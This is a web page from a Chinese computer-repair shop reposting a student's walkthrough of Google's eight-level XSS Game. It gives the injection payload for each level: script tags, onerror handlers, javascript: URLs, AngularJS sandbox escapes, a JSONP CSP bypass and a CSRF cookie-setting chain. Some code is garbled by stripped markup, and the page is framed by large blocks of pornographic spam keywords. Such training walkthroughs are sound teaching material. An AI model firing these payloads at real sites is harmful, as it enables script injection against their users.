国产精品久av福利在线观看_亚洲一区国产精品_亚洲黄色一区二区三区_欧美成人xxxx_国产精品www_xxxxx欧美_国产精品久久婷婷六月丁香_国产特级毛片

錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務技術文章
Google最新XSS Game Writeup

作者: 佚名  日期:2017-05-05 07:55:57   來源: 本站整理

 本文介紹了如何完成谷歌最新的XSSGame的過程,完成了這八個挑戰(zhàn)就有機會獲得Nexus 5x。實際上這八個挑戰(zhàn)總體來說都不難,都是些常見的xss。通關要求是只要能彈出alert窗口即可。
第一關 
 反射型xss,在搜索框提交的內(nèi)容最后會出現(xiàn)在結果頁面的html代碼里,沒有任何過濾,直接搜索:
script>alert('freebuf')script>

第二關
 還是反射型,提交內(nèi)容后會有一定延遲。通過查看html源碼可以知道延遲的時間(timer=)被直接插入到了img標簽里的onload事件里:
id="loading" src="/static/img/loading.gif" style="width: 50%" onload="startTimer('');" />

 直接請求url:/?timer=’-alert(1)-’,通關。
第三關
 展示了一些貓的圖片,當圖片換了后,url只是變化了#后面的內(nèi)容(#1 > #2),感覺可以通過這個id來反射xss
查看源代碼:
function chooseTab() {
     var html = "Cat " + parseInt() + "
";
     html += " +  + ".jpg' />";
      
     document.getElementById('tabContent').innerHTML = html;
      
     // Select the current tab
     var tabs = document.querySelectorAll('.tab');
     for (var i = 0; i if (tabs[i].id == "tab" + parseInt()) {
             tabs[i].className = "tab active";
         } else {
             tabs[i].className = "tab";
         }
     }
      
     window.location.hash = ;
      
     // Tell parent we've changed the tab
     top.postMessage({'url': self.location.toString()}, "*");
}
 哼,根據(jù)上一關的靈感,感覺可以繼續(xù)利用一下on事件,修改id后,圖片肯定是不存在的,于是使用onerror:
    #1'onerror=alert(1)>

 
搞定
第四關
 打開后是一個注冊頁面,讓我們填寫郵箱地址,注冊完成后通過url里面的next參數(shù)把我們跳轉(zhuǎn)回主頁,查看源碼:
 script>
  setTimeout(function() { window.location = user provided>; }, 1000);
script>
 在html中,鏈接可以是js代碼,比如:
a href="javascript:...">a>
直接請求這個跳轉(zhuǎn)url:
confirm?next=javascript:alert(1)
 

第五關
 一個F歌(foogle)搜索框,使用了angularJS 1.5.8,感覺是爆過漏洞的,上某網(wǎng)搜索(angularjs 1.5.8 injection)找到利用方法:
?utm_term=&utm_campaign={{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

 第六關
 angularJS 1.2版本的搜索框,在搜索框中提交的內(nèi)容最終進到了class為ng-non-bindable的div標簽里:
  #普通的div標簽
Normal: {{1 + 2}}
  #輸出:Normal: 3
  #ng-non-bindable
Ignored: {{1 + 2}}
  #輸出:Ignored: {{1 + 2}}
 隨后發(fā)現(xiàn)如果直接提交花括弧會被刪掉,于是使用“{”,最后構造這樣一個url:
?query={{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
第七關
 通過GET(參數(shù)menu)和JSONP請求加載了一個博客頁面,而響應的title,pictures會被處理為h1標簽和img標簽。關卡提示:common CSP bypass。
 猜測xss

可能會在menu參數(shù)里,JSONP里的callback參數(shù)(知識擴展)可以用來注入我們的js代碼,開始構造我們的url:
?menu=base64_encode(script src="jsonp?callback=alert(1)%3b%2f%2f">script>)
第八關
 要求是對任何用戶都有效,無論是登錄的還是未登錄的,要想通過必須得利用CSRF,self-xss,CSP。/transfer下是個很明顯的反射性xss,所以難度在于怎樣設置csrf_token可以匹配cookie。
 最后發(fā)現(xiàn)在登錄后會有一個請求設置用戶cookie并把用戶重定向到主頁,url如下:
 set?name=username&value=&redirect=index #作孽啊!
 根據(jù)這個url就可以猜測到后端代碼寫得是有多簡陋。。。
有了這個作孽的東西,我們就可以設置自己的csrf_token并把用戶重定向到/transfer,以便執(zhí)行我們注入的js代碼。構造如下url:
set?name=csrf_token&value=csrf_token>&redirect=url_encode(/transfer?name=freebufer&amount=3">script>alert(1)script>&csrf_token=csrf_token>)

寫出這種代碼的,在我們那是要被BGM的! 高中生第一次寫writeup,如有不足望擔待,勿噴。



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯(lián)想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數(shù)和判...
  • IIS 8 開啟 GZIP壓縮來減少網(wǎng)絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅(qū)動時提示不包含數(shù)字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統(tǒng)快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯(lián)系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區(qū)域: 遼寧錦州市區(qū)
    主要業(yè)務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網(wǎng)設置,IT服務外包,局域網(wǎng)組建,ADSL共享上網(wǎng),路由器設置,數(shù)據(jù)恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    精品亚洲成a人在线观看 | 免费不卡在线视频| 国产精品视频你懂的| 亚洲黄色有码视频| 日本特黄a级片| 久久99久久亚洲国产| 五月婷婷激情综合网| 国产乱码精品一区二区三区忘忧草| 狠狠色丁香婷婷| 国产又粗又猛又爽又| xxx在线播放| www午夜视频| 9191国产视频| 欧美精品二区三区四区免费看视频| 欧美成人久久久| 国产精品一区二区三区乱码| 国产99久久精品一区二区300| 国产精品迅雷| 日漫免费在线观看网站| 大陆一级毛片免费观看| 日日夜夜中文字幕| 五月六月丁香婷婷| 伊人av成人| 国产区二精品视| 国产精品h在线观看| 欧美成人性生活| 亚洲精品mp4| 777色狠狠一区二区三区| 午夜成人免费视频| 亚洲激情一二三区| 国产欧美日韩激情| 狠狠色2019综合网| 欧美午夜影院| 久久久久午夜电影| 在线看成人短视频| 9l视频自拍九色9l视频成人| 精品日本视频| 在线天堂资源www在线污| 欧美hdxxxxx| 99久久精品免费观看国产| 国产大学生校花援交在线播放| 亚洲在线激情| 人妻精品久久久久中文| 日本不卡视频一区| 超级砰砰砰97免费观看最新一期| 男女视频一区二区三区| 国产亚洲精品网站| www.亚洲天堂网| 可以免费观看av毛片| 国产精品第12页| 欧美一级黄色影院| 亚洲欧美自偷自拍另类| 手机av在线网站| 亚洲一二三av| 亚洲国产欧洲综合997久久| 国产在线精品日韩| 国内一区在线| 欧美激情视频一区二区三区| 久久婷婷人人澡人人喊人人爽| 国产乱码精品一区二区三区日韩精品| 91精品国产一区二区三区动漫| 国产精品一区二区三区观看| 欧美成人蜜桃| 91麻豆天美传媒在线| 国产精品18久久久久久首页狼| 性色av一区二区咪爱| 5566日本婷婷色中文字幕97| 国产精品亚洲第一区| 51国产成人精品午夜福中文下载 | 国产无遮挡在线视频免费观看| 中文字幕在线资源| 麻豆影视在线观看_| 成人爱爱网址| 欧美人成在线观看ccc36| 在线看片不卡| 奇米综合一区二区三区精品视频| 国产成人精品影院| 国产精品久久久一本精品| 亚洲超碰97人人做人人爱| 欧美性色黄大片| 亚洲欧洲免费视频| 97香蕉久久超级碰碰高清版| 91在线国产电影| 亚洲在线播放电影| 91精品视频观看| 免费99视频| 日韩欧美一区三区| 99久久免费看精品国产一区| 成人免费毛片东京热| 国产精品乱码久久久| 国产一级片子| 亚洲伦理在线| 美女100%一区| 国产99久久| 久久99久久久久| 亚洲精品欧美二区三区中文字幕| 91欧美激情一区二区三区成人| 中文字幕一区二区三区精华液| 欧美视频第二页| 久久精品成人动漫| 97人人澡人人爽| 无码精品a∨在线观看中文| 噜噜噜在线视频| 在线亚洲美日韩| 欧美日韩国产精品激情在线播放| yy1111111| 伊人网视频在线| 岛国在线免费| 色女人在线视频| 国产乱码精品一区二区三区四区| 美女视频黄 久久| 亚洲国产成人高清精品| 亚洲午夜精品久久久久久性色| 欧美老肥妇做.爰bbww| 中文字幕在线亚洲| 国产精品免费观看高清| 欧美一级裸体视频| 麻豆chinese极品少妇| 午夜男人天堂| 国产乱理伦片a级在线观看| 91成人精品在线| 狠狠色综合播放一区二区| 欧美午夜片在线免费观看| 欧美大胆a视频| 中文字幕免费在线不卡| 干b视频在线观看| 午夜视频福利在线| 欧美美女搞黄| 中文字幕在线观看网站| 高清欧美性猛交xxxx黑人猛| 激情综合色播五月| 欧美日韩精品专区| 国产深夜精品福利| 国产精品一区二区羞羞答答| 最近免费中文字幕大全免费版视频| 成年网站在线看| 国产精品亚洲一区二区三区在线观看| 亚洲国产二区| 亚洲成人av在线电影| 国模吧一区二区三区| 精品一区二区三区无码视频| 妺妺窝人体色www聚色窝仙踪| 人人爱人人爽| 日韩欧美精品电影| 日韩av中文在线观看| 欧美老肥妇做.爰bbww| 99精品国产高清一区二区| 欧美一级爽aaaaa大片| 性感美女一区二区三区| 亚洲精品成人区在线观看| 国产高清av在线| 亚洲激情中文| 性感美女极品91精品| 国产精品69久久| 九九热视频免费| 亚洲人妻一区二区| 丝袜在线观看| 日本中文一区二区三区| 日韩午夜激情av| 欧美激情第一页在线观看| 免费精品在线视频| 先锋影音av在线资源| 国产精品男女| 中文字幕在线不卡一区二区三区| 午夜精品美女自拍福到在线| 日本人69视频| 日本高清一二三区| 毛片女人与拘交视频| 一区二区三区在线免费看| 国产日产亚洲精品系列| 国外色69视频在线观看| 亚洲国产午夜精品| 久久这里只有精品1| 91精品国产自产观看在线| 午夜激情一区| 欧美亚洲高清一区| 久久婷婷人人澡人人喊人人爽| 久草网在线观看| 天堂a中文在线| 久久综合图片| 亚洲欧美日韩直播| 国产精品欧美激情在线观看| 无码精品视频一区二区三区| 裤袜国产欧美精品一区| 国产视频一区二区三区在线观看| 欧美一级黄色网| 国产熟妇久久777777| 2色视频网站| 清纯唯美日韩| 欧美精品乱码久久久久久按摩| 欧美性视频在线播放| 国产高潮流白浆喷水视频| 亚洲三级欧美| 国产精品理论片| 粉嫩av一区二区三区免费观看| 中文字幕 91| 国产永久免费| 国产精品一区二区99| 911国产精品| 日本黄网站免费|